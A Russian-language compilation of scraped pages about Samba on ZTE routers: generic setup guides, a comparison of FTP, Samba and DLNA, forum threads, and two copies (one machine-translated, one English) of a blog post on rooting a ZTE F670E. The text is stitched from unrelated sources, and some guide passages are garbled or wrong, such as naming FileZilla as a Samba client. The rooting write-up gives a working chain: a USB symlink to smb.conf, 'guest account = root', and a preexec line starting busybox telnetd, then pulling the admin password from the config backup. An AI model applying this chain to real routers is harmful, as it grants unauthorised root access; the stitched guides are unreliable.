Сервис samba в роутере zte что это

Samba — это свободная реализация протокола SMB/CIFS, использование которого позволяет обмениваться файлами и принтерами между компьютерами в сети. Если вы используете роутер ZTE, вы можете настроить Samba для обмена файлами между вашими устройствами. В этой статье мы рассмотрим подробную инструкцию по настройке Samba на роутере ZTE.

Первый шаг — настройка роутера. Для этого зайдите в веб-интерфейс роутера, введя его IP-адрес в адресной строке браузера. Затем найдите раздел настройки сети и выберите вкладку «Расширенные настройки». Найдите раздел «Функция sdcard / nfs / smb» и активируйте опцию «Разрешивать подключение к Windows по Samba». Не забудьте сохранить изменения.

Второй шаг — создание пользователей. Чтобы использовать Samba, вам необходимо создать пользователей с учетными записями. Вернитесь в веб-интерфейс роутера и найдите раздел настройки пользователей. Создайте нового пользователя, указав имя пользователя и пароль. Запомните эти данные, они будут необходимы для подключения к роутеру через Samba.

Третий шаг — настройка общего доступа к файлам. Вернитесь в веб-интерфейс роутера и откройте раздел Samba. Здесь вы можете создать новую общую папку, указав имя и путь к ней. Затем выберите пользователя или группу пользователей, которым вы хотите предоставить доступ к этой папке. Не забудьте сохранить изменения.

Поздравляю, вы успешно настроили Samba на роутере ZTE! Теперь вы можете обмениваться файлами между вашими устройствами в сети. Просто подключитесь к роутеру через Samba, используя имя пользователя и пароль, которые вы создали ранее, и обменяйтесь файлами без проблем.

Содержание

Выбор роутера ZTE
Подготовка к настройке
Установка необходимых программ
Создание сетевых папок на роутере

Выбор роутера ZTE

Перед выбором роутера следует учесть некоторые факторы, например, площадь помещения, количество устройств, подключенных к сети, и требования к скорости и стабильности соединения.

Модели роутеров ZTE предлагают разные характеристики, как стандарт Wi-Fi (802.11n, 802.11ac и т. д.), так и количество портов Ethernet, поддержку VoIP и USB-портов.

Выбор роутера ZTE также может зависеть от потребностей в безопасности сети, например, поддержки защиты от DDoS-атак, наличия функции фильтрации URL-адресов или возможности настройки виртуальных частных сетей (VPN).

Ознакомьтесь с различными моделями роутеров ZTE, сравните их характеристики и выберите подходящую модель, которая наиболее полно удовлетворит ваши потребности в сети.

Подготовка к настройке

Перед началом настройки samba на роутере ZTE необходимо выполнить несколько предварительных шагов:

Убедитесь, что ваш роутер ZTE подключен к сети Интернет и работает корректно.
Устанавливайте последнюю версию прошивки на роутер, чтобы избежать возможных ошибок и проблем при настройке.
Подключите жесткий диск или флеш-накопитель к USB-порту роутера.
Убедитесь, что ваш компьютер подключен к роутеру посредством кабеля Ethernet или через Wi-Fi.
Запишите IP-адрес роутера ZTE. Он потребуется вам для доступа к настройкам роутера через веб-интерфейс.
Установите программу для работы с Samba на компьютере, например, FileZilla или WinSCP.

После выполнения этих шагов вы будете готовы к настройке samba на роутере ZTE и сможете продолжить процесс настройки согласно инструкции.

Установка необходимых программ

Перед настройкой Samba на роутере ZTE необходимо установить следующие программы:

1. Samba:

Самая главная программа, которую нужно установить — Samba. Samba – это свободная реализация протокола SMB/CIFS, который используется для создания файловых и печатных серверов на платформе Linux. Установка Samba позволит нам настроить общий доступ к файлам и папкам через протокол SMB.

2. Web-интерфейс для Samba:

Для удобного управления Samba можно установить web-интерфейс. С помощью web-интерфейса можно будет настроить различные параметры Samba, создавать и удалять пользователей, управлять общим доступом к папкам и многое другое.

Существует несколько вариантов подобных web-интерфейсов, и мы рассмотрим установку одного из самых популярных – GADMIN-Samba.

3. Клиенты Samba:

Если вы планируете подключаться к Samba-серверу с другого устройства, вам понадобится установить соответствующие клиенты Samba. Как правило, они уже предустановлены в большинстве современных ОС (Windows, macOS, Linux).

После установки этих необходимых программ, мы сможем приступить к настройке Samba на роутере ZTE.

Создание сетевых папок на роутере

Для создания сетевых папок на роутере ZTE необходимо выполнить следующие шаги:

Откройте веб-интерфейс роутера, введя в адресной строке браузера IP-адрес роутера.
Введите логин и пароль для входа в систему роутера.
На странице настроек найдите раздел «Samba» или «Сетевое хранилище».
В этом разделе найдите опцию «Создать сетевую папку» или «Create Network Share».
Выберите место расположения папки: на встроенной памяти роутера или на подключенном внешнем устройстве хранения.
Введите имя папки и, при необходимости, описание.
Установите параметры доступа к папке: разрешить или запретить чтение, запись и удаление файлов.
Сохраните настройки и выполните перезапуск роутера.

После выполнения этих шагов у вас будет создана сетевая папка, к которой можно будет обратиться из других устройств в сети для обмена файлами.

Источник

На чтение 4 мин Просмотров 19.9к. Опубликовано 10 марта 2020
Обновлено 19 мая 2023

Недавно один из подписчиков задал вопрос, касающийся файлового накопителя, подключенного к USB порту wifi роутера. В чем отличия FTP сервера от Samba и DLNA и какой из них лучше? Постараюсь без сложных терминов показать разницу между этими файловыми хранилищами.

Что такое FTP, Samba, DLNA?

FTP (от англ. File Transfer Protocol — протокол передачи файлов) — стандартный протокол, предназначенный для передачи файлов по сетям.

Samba, или SMB (от англ. Server Message Block) — сетевой протокол прикладного уровня для удалённого доступа к файлам, принтерам и другим сетевым ресурсам, а также для межпроцессного взаимодействия.

DLNA — (от англ. Digital Living Network Alliance) — универсальный протокол для обмена медиаданными между устройствами различных производителей.

В чем отличие FTP, Samba (smb) и DLNA серверов?

Если подключить к USB разъему маршрутизатора флешку или внешний жесткий диск, то у нас появится возможность запустить на нем один из вышеперечисленных или одновременно несколько типов файловых серверов. В чем разница?

DLNA

Больше всего отличаются Samba и FTP серверы от DLNA. Последний предназначен только для трансляции видео, музыки или фото с одного устройства на другое. Например, вы сохранили какой-то ролик на компьютер или смартфон и хотите вывести его на большой экран телевизора. Для этого необходимо установить программу для создания медиасервера и начать трансляцию по сети. А на ТВ открыть медиаплеер с поддержкой DLNA и воспроизвести.

То же самое и на роутере. После запуска DLNA сервера медиа контент с вашего внешнего накопителя появится в проигрывателе на другом устройстве, подключенном к wifi. После чего его можно воспроизвести.

Кроссплатформенность

Простота настройки и подключения

Поддерживаются только медиафайлы

Возможны тормоза при воспроизведении

Работает не со всеми расширениями

Samba

Samba сервер — это по сути обычная расширенная папка с открытой к ней внешним доступом. И неважно, гелиографа находится — на жёстком диске компьютера или на флешке, вставленной в USB роутера. Вы одинаково можете зайти в неё по локальной как в обычную директорию своего устройства и увидеть размещённые в ней документы всех типов с любым расширением. Можно его открыть, удалить или переместить.

Если посмотреть на то, как отображаются DLNA и Samba файловые серверы в Windows, то вот вам скрин экрана. Первый находятся в одном разделе с медиа устройствами. Второй — отображается в качестве подключённого жестоко диска.

Простота настройки

Быстрая скорость

Кроссплатформенность

FTP

FTP сервер — тоже хранилище файлов, которое можно активировать на маршрутизаторе. Однако, для подключения к нему с компьютера или ноутбука требуется специальная программа — FTP клиент. Через обычную оболочку операционной системы Windows, Android или iOS подключиться к диску не получится. Работа с ФТП схожа с известным Total Commander — будет два окна, между которыми можно обмениваться файлами.

По большому счету, Samba и FTP для конечного пользователя почти не отличается. Кроме того, что файловый сервер SMB проще в настройке, так камне требует дополнительного софта, и немного быстрее в передаче данных.

Для подключения необходим дополнительный софт

Ниже скорость обмена данными

Ошибки в передаче файлов

Что лучше на роутере — DLNA, Samba или FTP?

Теперь, я думаю, стало понятно, в чем отличие этих вариантов создания через роутер файлового сервера внутри локальной сети. Какой же лучше для работы — FTP, Samba или DLNA?

Если вы собираетесь использовать внешний диск только для загрузки на него видео или фото для последующего просмотра на другом устройстве, то можно остановиться на DLNA.
Однако способ не подойдёт, если речь идёт про обмен другими документами, например текстовыми. В этом случае можно запустить FTP сервер. Он легко определяется в сетевом окружении на той же приставке Android Smart TV. Но для работы по ФТП в ряде случаев (например для Windows) нужна установка дополнительных программ.
В итоге универсальным средством является Самба сервер, или общая папка в локальной сети. На SMB могут храниться любые типы файлов, а доступ к ним будет доступен из любого приложения со всех устройств, подключённых к WiFi сигналу роутера.

Актуальные предложения:

Задать вопрос

10 лет занимается подключением и настройкой беспроводных систем

Выпускник образовательного центра при МГТУ им. Баумана по специальностям «Сетевые операционные системы Wi-Fi», «Техническое обслуживание компьютеров», «IP-видеонаблюдение»

Автор видеокурса «Все секреты Wi-Fi»

( 12 оценок, среднее 1.67 из 5 )

Источник

Сервис самба — это программное обеспечение, которое позволяет использовать роутер ZTE в качестве файлового сервера. Он предоставляет возможность совместного использования файлов и папок между устройствами в локальной сети.

Настройка сервиса самба на роутере ZTE несложна и может быть выполнена даже пользователями с минимальными навыками в области сетевого администрирования. Для начала необходимо войти в веб-интерфейс роутера, используя учетные данные администратора. Затем, в разделе настроек, нужно активировать функцию самба.

Важно запомнить, что безопасность вашей локальной сети может быть недостаточной при использовании самбы. Рекомендуется настроить доступ только для авторизованных пользователей и установить сложные пароли.

После настройки сервиса самба на роутере ZTE остается только добавить файлы и папки, которые вы хотите совместно использовать. Для этого можно воспользоваться проводником в Windows или другим подобным инструментом на вашем устройстве. После добавления файлов и папок, они будут доступны для всех устройств в локальной сети.

Сервис самба на роутере ZTE — это удобный инструмент для обмена файлами между устройствами в локальной сети. Он позволяет быстро и безопасно передавать и получать файлы, делиться ресурсами и облегчает работу в команде. Настройка самбы на роутере ZTE не займет много времени, но принесет много пользы в повседневной жизни.

Содержание

Описание сервиса самба на роутере ZTE
Настройка сервиса самба на роутере ZTE
Возможности использования сервиса самба на роутере ZTE

Описание сервиса самба на роутере ZTE

Сервис самба на роутере ZTE представляет собой программное обеспечение, которое позволяет реализовать сетевое взаимодействие между различными компьютерами в домашней или офисной сети. С помощью этого сервиса можно создавать и управлять общей файловой системой, которая будет доступна для обмена данными между устройствами.

Сервис самба базируется на протоколе SMB/CIFS, который предназначен для передачи файлов и принято использовать для межсетевого обмена данными. Он поддерживает множество функций, таких как доступ к общим папкам, печать документов на общем принтере, аутентификацию пользователей и другие возможности.

На роутере ZTE можно настроить сервис самба для доступа к файлам и папкам на USB-накопителе, который подключен к роутеру. Пользователи смогут подключаться к этим ресурсам через локальную сеть и получать доступ к файлам, делиться ими и изменять права доступа в соответствии с необходимостью.

Для настройки сервиса самба на роутере ZTE необходимо зайти в веб-интерфейс роутера, найти в меню настройки «Сервис самба» и выполнить несколько простых шагов. Сервис можно включить или отключить по необходимости, задать общий доступ к выбранной папке, изменить уровень авторизации пользователей и настроить другие параметры, в зависимости от требований пользователей.

Использование сервиса самба на роутере ZTE позволяет эффективно организовать обмен файлами между компьютерами в локальной сети и расширить функциональность сетевого хранилища.

Настройка сервиса самба на роутере ZTE

Сервис самба предоставляет возможность обмениваться файлами и ресурсами между устройствами в одной локальной сети. Настройка данного сервиса на роутере ZTE позволяет создать общую папку, к которой можно обратиться с других устройств через протокол SMB/CIFS.

Для начала настройки сервиса самба на роутере ZTE необходимо выполнить следующие шаги:

Зайдите в настройки роутера, введите логин и пароль администратора.
Найдите в меню пункт «Файлы и серверы» или аналогичный.
Далее найдите настройки сервиса самба и активируйте его.
Создайте общую папку, в которую будут добавлены файлы и ресурсы.
Укажите права доступа к данной папке или укажите пароль для доступа извне.
Сохраните настройки и перезагрузите роутер.

После выполнения этих шагов сервис самба будет настроен на роутере ZTE и вы сможете обмениваться файлами и ресурсами между устройствами в своей локальной сети.

Обратите внимание, что настройки можете отличаться в зависимости от модели роутера и версии прошивки. При возникновении сложностей рекомендуется обратиться к руководству пользователя или официальной поддержке.

Пример настроек сервиса самба:

Название	Права доступа
Общая папка	Чтение и запись

Возможности использования сервиса самба на роутере ZTE

Сервис самба на роутере ZTE предоставляет ряд полезных функций, которые можно использовать для облегчения работы с сетевыми устройствами и обмена файлами. Ниже перечислены основные возможности, доступные при использовании сервиса самба на роутере ZTE.

Общий доступ к файлам и папкам: Сервис самба позволяет создать общую папку на роутере, к которой можно обратиться с любого устройства в сети. Это удобно, если вы хотите обмениваться файлами с другими участниками сети или управлять файлами на удаленном устройстве.
Возможность создания локальной сети: Сервис самба позволяет создать локальную сеть, к которой можно подключить несколько компьютеров или устройств. Это полезно, если вы хотите передавать файлы между своими устройствами без использования интернета.
Управление доступом к файлам: Сервис самба позволяет настроить различные уровни доступа к файлам и папкам в общей папке. Вы можете разрешить только чтение файлов, разрешить изменение файлов или предоставить полный доступ к общим папкам.
Резервное копирование данных: Сервис самба позволяет создать резервные копии данных на роутере. Вы можете настроить автоматическое резервное копирование файлов с определенных устройств или папок в сети.
Подключение к удаленным устройствам: Сервис самба позволяет подключаться к удаленным устройствам в сети и работать с их файлами и папками. Вы можете управлять удаленными файлами, копировать или перемещать их между устройствами.

Возможности использования сервиса самба на роутере ZTE значительно облегчают работу с файлами и позволяют максимально удобно обмениваться информацией между устройствами. Вы можете настроить доступ к файлам и папкам в сети, создать локальную сеть для обмена файлами или выполнить резервное копирование важных данных. Сервис самба на роутере ZTE предлагает надежные и удобные возможности для эффективного управления файлами в сети.

Источник

Обновлено: 09.10.2023

Недавно я установил свой первый FTTH-роутер (pepephone, но та же модель используется в masmovil и jazztel), и, как любой сетевой инженер, я хотел иметь полный доступ к роутеру. Просматривая обширный Интернет, я нашел сообщение в блоге, в котором использовался USB с символической ссылкой на smb.conf, поэтому его можно отредактировать, чтобы добавить параметры exec для выполнения загруженного busybox, чтобы открыть альтернативный telnetd, но в статье была большая проблема, которая делает это невозможным. для работы на моем маршрутизаторе: F680 из статьи имеет архитектуру ARM. Вместо этого у моего маршрутизатора MIPS. Это важно знать заранее, если вы используете загружаемые извне исполняемые файлы busybox. В конце концов, я пропустил хак busybox, чтобы напрямую разрешить административное telnet-соединение, вместо глючного ограниченного. Вот как я это сделал, я предполагаю, что маршрутизатор имеет IP-адрес 192.168.1.1.

Используя любые окна, отформатируйте любой накопитель в NTFS.
Используя любой Linux, смонтируйте флешку в формате NTFS, измените каталог на смонтированный путь и выполните следующую символическую ссылку:

Я также хотел сделать полный незашифрованный дамп конфигурации, поэтому в терминале telnet сделайте следующее:

для i в `sendcmd 1 DB p | авк »’; эхо $i; sendcmd 1 БД p $i; готово

Подготовьтесь к большому дампу данных.

Также вы можете загрузить предварительно скомпилированный busybox-mips и выиграть некоторые команды, такие как vi, uname и netstat.

Эта дата была опубликована в Эль-Доминго, 20 августа 2017 г. в 14:36, а также в архиве с более низким оборудованием, Linux. Puedes seguir cualquier Respuesta Esta Entrada Травес-де-ла-Alimentacion RSS 2.0. Puedes dejar un comentario, o hacer un trackback desde tu sitio.

6 комментариев к «ZTE680 Hardware V4.0 (V2?) Hack»

логин root и пароль Zte521 не работает

Здравствуйте,
я подключаюсь, но когда мне нужно что-то сделать:
/bin/sh: доступ запрещен
я ничего не могу сделать.
Можете ли вы помочь мне, пожалуйста.
Спасибо.

Я не могу получить доступ к службе samba, с помощью моего Debian я пытался получить доступ к smb://samba@192.168.1.1/samba, но требуется пароль, а я не знаю. Вы знаете, как подключиться к серверу samba?

Боюсь, прошивка вашего маршрутизатора обновлена, и эта уязвимость теперь закрыта.

Эта информация бесполезна. Ни мне, ни всем остальным.

Здравствуйте, Хулио. Как я уже говорил, это работало на определенной аппаратной версии и определенной версии прошивки. Какое-то обновление исправило его, поэтому он перестал работать. Лучшее, что вы можете сделать, это не использовать маршрутизаторы интернет-провайдера и установить свои собственные.

Мне предоставили маршрутизатор ZTE ZXHN H267N, который позволяет экспортировать подключенное USB-устройство хранения данных в общий ресурс samba.

Как вы можете видеть на снимке экрана ниже, вариантов конфигурации немного, и все довольно просто.

Из Windows я могу открыть общий ресурс, просто обратившись к \\192.168.1.1 : я могу просматривать его, читать файлы, записывать/копировать в него файлы. так что все работает, как и ожидалось.

Но из Linux я не могу смонтировать его в режиме чтения-записи. Я действительно могу смонтировать его, но я не могу ничего ни читать, ни писать. Я пробовал любую логическую комбинацию параметров монтирования безрезультатно.

В приведенном выше примере общий ресурс смонтирован, а a не существует. Кроме того, если я запускаю lsattr для уже существующего файла, я получаю следующее:

Похоже, у меня нет прав на чтение и запись. Я пробовал другие варианты, такие как:

Указание uid и gid от 1 до 10000 .
Указание sec для любого доступного параметра.
Указание пользователя локальному пользователю.
Установка пользователя и пароля и попытка монтирования не как гостя, а вместо этого указание имени пользователя и пароля.
Некоторые другие варианты и комбинации вышеперечисленного.

Я не могу понять, какие еще параметры нужно указать, чтобы смонтировать этот общий ресурс как rw . В документации маршрутизатора ничего не сказано о том, какие параметры следует указать для его корректного монтирования.

Удалось ли кому-нибудь смонтировать общий ресурс с этого или подобного маршрутизатора как R/W?

Также приветствуются любые советы.

— РЕДАКТИРОВАТЬ 1 —

По совету @gmelis, я поставил прослушиватель tcpdump на машину непосредственно перед монтированием, чтобы посмотреть, что происходит. Фильтр, который я пробовал, был: -i eth0 -n host 192.168.1.1 , и результат:

Из этого вывода я сделал вывод, что была первоначальная попытка установить соединение через порт 445, который сбрасывается удаленным хостом, затем следующая попытка — через порт 139, которая, похоже, удалась.

Мне также удалось запустить команду ngrep с эквивалентным фильтром, и результат:

Испытывались дополнительные вещи:

Я попытался смонтировать точку как uid=nobody и gid=nogroup с теми же результатами.
Я запустил chmod -R 777 в точке монтирования, тоже ничего не изменил.
Я обнаружил интересную вещь: если я запускаю touch, я получаю сообщение об отказе в доступе, но если я пытаюсь запустить mkdir, я всегда получаю сообщение mkdir: невозможно создать каталог blah’: File exists`, независимо от имени каталога. Я указываю (и, конечно же, его не существует).

— РЕДАКТИРОВАТЬ 2 —

Я также попытался запустить smbclient -L //192.168.1.1 (без пользователя), и он запрашивает пароль, которого у меня нет. Если я ввожу любое значение в качестве пароля, отображаются указанные выше ошибки ( NT_STATUS_ACCESS_DENIED ).

Но я также попытался активировать защиту на панели маршрутизатора (установив для Anonymous значение no и установив имя пользователя и пароль), и вот что я обнаружил:

1) Если я просто запущу: smbclient -L //192.168.1.1 , меня попросят ввести пароль. Если я просто нажму Enter , я получу следующий вывод:

2) Если я ввожу «правильные» учетные данные, я получаю следующий вывод:

Я начинаю думать, что это какая-то ошибка в маршрутизаторе, но странно то, что монтирование общего ресурса samba работает на компьютерах с Windows без каких-либо проблем, где я также могу читать и записывать в общий ресурс.< /p>

Привет! Это будет просто быстрый отчет о том, что я сделал в прошлые выходные. Неделю назад у меня дома появился новый роутер. Просто из любопытства или потому, что мы всегда хотим знать, что внутри каждого устройства, я попытался найти прошивку маршрутизатора и конфигурации по умолчанию в Google. Я также хотел усилить защиту устройства и удалить все те настройки, которые идут по умолчанию и всегда являются проблемой безопасности. Угадайте, что я не смог найти никакой интересной информации об устройстве или хотя бы чего-то, что заставило бы меня почувствовать, что эта версия широко используется. Поэтому я решил получить root права самостоятельно.

Поскольку я не нашел информации об этом устройстве и не знал, что у него внутри, я решил попробовать несколько вещей и получить root-права самостоятельно. Короче говоря, я пытался использовать переполнение буфера на Samba, работающем локально, но мне это не удалось из-за того, что я думаю, была проблема с конфигурацией. Затем я злоупотребил символическими ссылками на той же Samba, чтобы перезаписать файл конфигурации Samba, раскрывая всю файловую систему и запуская команды от имени пользователя root.

Обзор

Я нашел руководство пользователя, но этого оказалось недостаточно. Я хотел узнать больше о роутере. Одна вещь, которая привлекла мое внимание, заключалась в том, что интерфейс не был зеленым, как у остальных устройств ZTE, и вся сеть была написана на lua. Вроде кастомная версия, может только для этого провайдера?

Тип устройства: F670E
Аппаратная версия V1.0
Версия программного обеспечения V1.0.10P1T7
Версия загрузки V1.0.10P1T8

Самба

Я обнаружил, что могу настроить сервер Samba. После сканирования роутера samba мне удалось выхватить версию: 1.9.16p10 (довольно старая, если честно, выпущена в 1997 году). Я был уверен, что это точка входа для получения доступа к этому устройству. Я взял один из своих USB-накопителей и подключил его напрямую к маршрутизатору. Ничего не произошло. Позже я обнаружил, что память USB должна быть отформатирована в NTFS.

Теперь я смог увидеть содержимое USB-накопителя, открыв \\192.160.1.1\samba. Что теперь? Так как я уже много чего перепробовал на сервере samba, и ничего не сработало (проверьте Неудачная попытка в конце поста). Я решил пойти на логическую ошибку. Я установил флешку на компьютер с Linux, чтобы создать символическую ссылку и посмотреть, как на это отреагирует сервер.

ln -s /var/samba/lib/smb.conf .

Проведя небольшое исследование маршрутизаторов ZTE и несколько пробных попыток, я обнаружил путь к конфигурационному файлу Samba. Я решил дать ему шанс. Я снова подключил USB-накопитель к маршрутизатору, и когда я попытался открыть файл с помощью общей папки, я увидел содержимое файла внутри сервера. Отлично!

Я сохранил его, и это сработало:

Теперь мы можем видеть содержимое всей файловой системы и, возможно, редактировать его. Но подождите, если вы настроили сервер Samba до того, как вы должны подумать о опции «preexec» или «root preexec».

Да, это то, чем кажется. Мы можем запустить код, просто отредактировав файл samba. Стоит отметить, что в этой версии Samba нет параметра root preexec, но мне удалось запустить код от имени пользователя root, добавив следующий параметр в начало файла конфигурации:

гостевая учетная запись = root

Если вы проверите исходное содержимое файла, вы заметите, что он выполнялся как none. Что ж, теперь мы запускаем samba от имени пользователя root и даже выполняем код.

Мы почти закончили. Теперь нам нужно извлечь содержимое маршрутизатора, чтобы мы могли спокойно проанализировать его без необходимости использовать эту старую и сломанную самбу.

Я скопировал busybox для систем ARM с именем busybox.А затем добавил в smb.conf следующую опцию:

preexec = /mnt/usb1_1/busybox telnetd -b 192.168.1.1:27 -l /mnt/usb1_1/sh

Когда я проверил порт с помощью nmap, он показал, что порт открыт, но не обнаружил службу telnet. Я пытался подключиться к нему с помощью Putty, но мне не повезло. После нескольких часов игры с различными двоичными файлами и опциями от busybox и маршрутизатора я сдался и решил использовать то, что у меня было на данный момент.

Я создал скрипт /mnt/usb1_1/backup.sh и добавил следующее содержимое:

Я дал ему права на выполнение, выполнив preexec = chmod +x /mnt/usb1_1/backup.sh . Если вы заметили вторую строку, она удалит флаг выполнения из файла. Это потому, что мы просто хотим запустить команду один раз и избежать сбоя маршрутизатора. Я также исключил некоторые папки, большинство из них являются виртуальными каталогами, которые монтируются маршрутизатором, и что-то может пойти не так, если мы попытаемся их скопировать.

Восстановление пароля администратора

Самое приятное было в конце, когда мой интернет-провайдер изменил мой пароль администратора, потому что я попросил их перенастроить мой маршрутизатор после нескольких неудачных попыток восстановить их настройки. И я снова использовал весь этот процесс, чтобы извлечь пароль веб-администратора из маршрутизатора, который мне не хотели давать. Как?

Я подключил флешку, изменил smb.conf и открыл доступ ко всей файловой системе. Затем я извлек файл, расположенный в `/userconfig/cfg/db_backup_cfg.xml`. Этот файл хранится с использованием сжатия Zlib. Я нашел этот скрипт на StackOverflow, который печатает текстовое содержимое XML-файла:

Заключение

Конечно, я несколько раз выходил из строя маршрутизатор, один раз сбрасывал его настройки по умолчанию и даже просил своего интернет-провайдера снова настроить маршрутизатор, потому что у меня были проблемы с подключением. Но было весело, теперь у меня есть целая прошивка рутера, которую я, возможно, скоро залью на гитхаб, а также я проэксплуатировал старомодный баг на самбе.

Неудачная попытка:

Я скачал исходный код и запустил быстрый статический сканер под названием FlawFinder. Вывод показал 1517 совпадений как возможные уязвимости. Слишком много для проверки, поэтому я сосредоточился на любом возможном переполнении буфера без проверки подлинности. Я видел, как они использовали getpass в нескольких частях источника для захвата и управления паролем. FlawFinder также дал мне следующую информацию:

Эта функция устарела и не может быть перенесена. Он был в SUSv2, но удален POSIX.2. То, что именно он делает, значительно различается между системами, особенно в том, где отображается его приглашение и откуда он получает свои данные (например, /dev/tty, stdin, stderr и т. д.). Кроме того, некоторые реализации переполняют буферы. (КВЕ-676, КВЕ-120, КВЕ-20). Делайте конкретные звонки, чтобы делать именно то, что вы хотите. Если вы продолжите использовать его или напишете свой собственный, обязательно обнулите пароль как можно скорее, чтобы пароль в открытом виде не оставался видимым в адресном пространстве процесса.

Проведя небольшое исследование, я обнаружил, что версия 1.9.17 на самом деле уязвима для переполнения буфера пароля. Я нашел общедоступный эксплойт и CVE-1999-0182. Как и ожидалось, этот эксплойт не сработал с первой попытки, поэтому мне пришлось немного изменить его, чтобы сделать его работоспособным.

После нескольких изменений и проверки SMB-пакетов, отправляемых пользователю, я пришел к выводу, что он неуязвим. Я думаю, что для того, чтобы этот эксплойт работал, необходимо включить простой текстовый пароль, чтобы вызвать переполнение. Не уверен насчет этого, но хотел упомянуть, может кто знает, почему это не работало, или это может быть просто кастомная версия самбы с какими-то патчами.

Попугай69

Отлично

Я хочу подключить USB-накопитель к маршрутизатору и использовать его в качестве медиа-сервера. Когда я подключаю его, в проводнике нет медиасервера, поэтому я решил зайти в настройки роутера и проверить. В настройках указано, что маршрутизатор обнаружил USB-накопитель. Я также заметил, что параметр DMS был отключен, поэтому я включил его и установил автоматический метод сканирования библиотеки, а также установил источник мультимедиа в качестве своего USB-накопителя. После этого медиа-сервер теперь отображается в проводнике, но когда я нажимаю на него, он открывает мой браузер и выводит меня на пустой HTML-файл с белым экраном.

Можете ли вы помочь мне с этим? Я очень хочу использовать NAS в качестве медиа-сервера

гггплайя

Выдающийся

Имейте в виду, что процессор маршрутизатора будет определять, насколько высокой будет скорость чтения USB. Таким образом, для видео с высоким битрейтом и высоким разрешением USB-порт маршрутизатора может обслуживать только 5 МБ / с или медленнее. Маршрутизаторы более высокого класса обычно способны развивать скорость около 25-30 МБ/с, а маршрутизаторы очень высокого уровня могут достигать скорости более 80 МБ/с. Поэтому, в зависимости от вашего видео, ваш маршрутизатор может быть неадекватным.

Похоже, ZTE использует собственное серверное программное обеспечение DLNA.Как правило, вам нужно заставить их программное обеспечение читать и каталогизировать файлы. Ему необходимо создать библиотеку файлов, которую он может обслуживать с помощью DLNA. Этот маршрутизатор слишком медленный для перекодирования, поэтому некоторые видео могут не воспроизводиться на вашем клиентском устройстве.

Я бы рекомендовал использовать ваш маршрутизатор только в качестве файлового сервера FTP или SMB (samba). Затем используйте его как сетевой диск NAS для подключения к ноутбуку. Или для вашего телевизора используйте коробку KODI или аналогичную для декодирования видео. Вы даже можете сделать дополнительный шаг и установить PLEX на свой ноутбук и использовать процессор вашего ноутбука для транскодирования. Ноутбук будет выступать в роли медиа-сервера.

Ралстон18

Титан

Марка и модель маршрутизатора?

К вашему сведению: просто имейте в виду, что использование USB-порта маршрутизатора для хранения/медиасервера может снизить производительность сети.

Ралстон18

Титан

[Примечание модератора.>

Из дубликата сообщения OP:

«У меня есть модем-маршрутизатор ZTE F600W с USB-портом. Когда я подключаю USB-накопитель к USB-порту, модем распознает его в меню USB-накопителя. Я хочу использовать свой модем как NAS, я уже включил DMS в настройках и метод сканирования медиатеки стоит авто и источник медиа 1 это мой usb накопитель а все остальные медиа источники оставлены пустыми Мой компьютер видит модем во вкладке сеть и имя F600W: Media Сервер: Но когда я нажимаю на него, я захожу в свой браузер и перехожу на пустую белую страницу, а URL-адрес http://192.168.1.1:52868/web/index.html, а экран просто пустой белый экрана.
Можете ли вы мне помочь? Я очень хочу использовать его как NAS»

Повторяющееся сообщение удалено.

гггплайя

Выдающийся

Похоже, ZTE использует собственное серверное программное обеспечение DLNA. Как правило, вам нужно заставить их программное обеспечение читать и каталогизировать файлы. Ему необходимо создать библиотеку файлов, которую он может обслуживать с помощью DLNA. Этот маршрутизатор слишком медленный для перекодирования, поэтому некоторые видео могут не воспроизводиться на вашем клиентском устройстве.

Попугай69

Отлично

Марка и модель маршрутизатора?

Это маршрутизатор F600W от ZTE.
Я думаю, что DMS означает цифровой медиасервер.
Вот скриншоты:

Попугай69

Отлично

Похоже, ZTE использует собственное серверное программное обеспечение DLNA. Как правило, вам нужно заставить их программное обеспечение читать и каталогизировать файлы. Ему необходимо создать библиотеку файлов, которую он может обслуживать с помощью DLNA. Этот маршрутизатор слишком медленный для перекодирования, поэтому некоторые видео могут не воспроизводиться на вашем клиентском устройстве.

Читайте также:

Забыли пароль от xiaomi mi wifi роутера

Настройка роутера МТС директор 615

Настройка VPN на роутере Keeetic

Как узнать пароль от Wi-Fi

Поменяйте ссылку tp или d, что лучше

Источник

Hi there! This will be just a quick write up about something I did last weekend. A week ago, I got a new router at home. Just by curiosity, or because we always want to know what’s inside of every device, I tried to google for the router’s firmware and the default configurations. I also wanted to harden the device and remove all those settings that come by default and are always a security problem. Guess what, I couldn’t find any interesting information about the device, or at least something that would make me feel that this version is being widely used. So I decided to root it by myself.

TL;DR

Since I didn’t find information about this device and I didn’t know what was inside of it, I decided to try a few things and root it by myself. In a nutshell, I tried to exploit a buffer overflow on the Samba running locally but I failed on doing this because of what I think was a configuration problem. Then I abused symlinks on the same Samba in order to overwrite a samba configuration file exposing the whole file system and running commands as root.

Overview

I found a user manual, but this wasn’t enough. I wanted to know more about the router. One thing thant caught my attention was that the interface wasn’t green as the rest of the ZTE devices, and the whole web was written in lua. It seems like a custom version, maybe just for this ISP?

Device’s information:

Device Type: F670E
Hardware Version V1.0
Software Version V1.0.10P1T7
Boot Version V1.0.10P1T8

Samba

I discovered that I was able to set up a samba server. After scanning the samba router, I could grab the version: 1.9.16p10 (Pretty old to be honest, it was released in 1997). I was sure that this was the entry point to get access to this device. I took one of my USB sticks and plugged in directly to the router. Nothing happened. I discovered later that the USB memory must be formatted to NTFS.

Now I was able to see the content of the USB drive by accessing \\192.160.1.1\samba. Now what? Since I had already tried a lot of things against the samba server and nothing had worked (check Failed attempt, at the end of the post). I decided to go for a logical bug. I mounted the pen drive on a Linux machine with the intention of creating a symlink and see how the server responded to that.

ln -s /var/samba/lib/smb.conf .

By doing a little bit of research about ZTE routers and some trial and tries, I discovered the path to the Samba config file. I decided to give it a chance. I mounted back the USB stick to the router and when I tried to open the file using the shared folder I could see the content of the file inside the server. Great!

    [global]
        guest account = nobody
        deadtime = 5
        log level = 0
        server string = Samba Server
        security = share
        load printers = no
		workgroup = workgroup           
		netbios name = smbshare            
        short preserve case = yes   
        preserve case = yes         
    [samba]
        comment = samba share dir
        read only = no 
		guest ok = yes    
        guest only = yes
		max connections = 3       
		path = /mnt

Let’s try to change it and see if we are able to overwrite it. I added a new share:

	[global]
    guest account = root
    deadtime = 5

    log level = 0

    server string = Samba Server
    security = share
    load printers = no
    workgroup = workgroup
    short preserve case = yes
    preserve case = yes
    netbios name = smbshare

    [samba]

    comment = samba share dir

    read only = no
    guest ok = yes
    guest only = yes
    short preserve case = yes
    preserve case = yes
    max connections = 3
    path = /mnt

    [root]

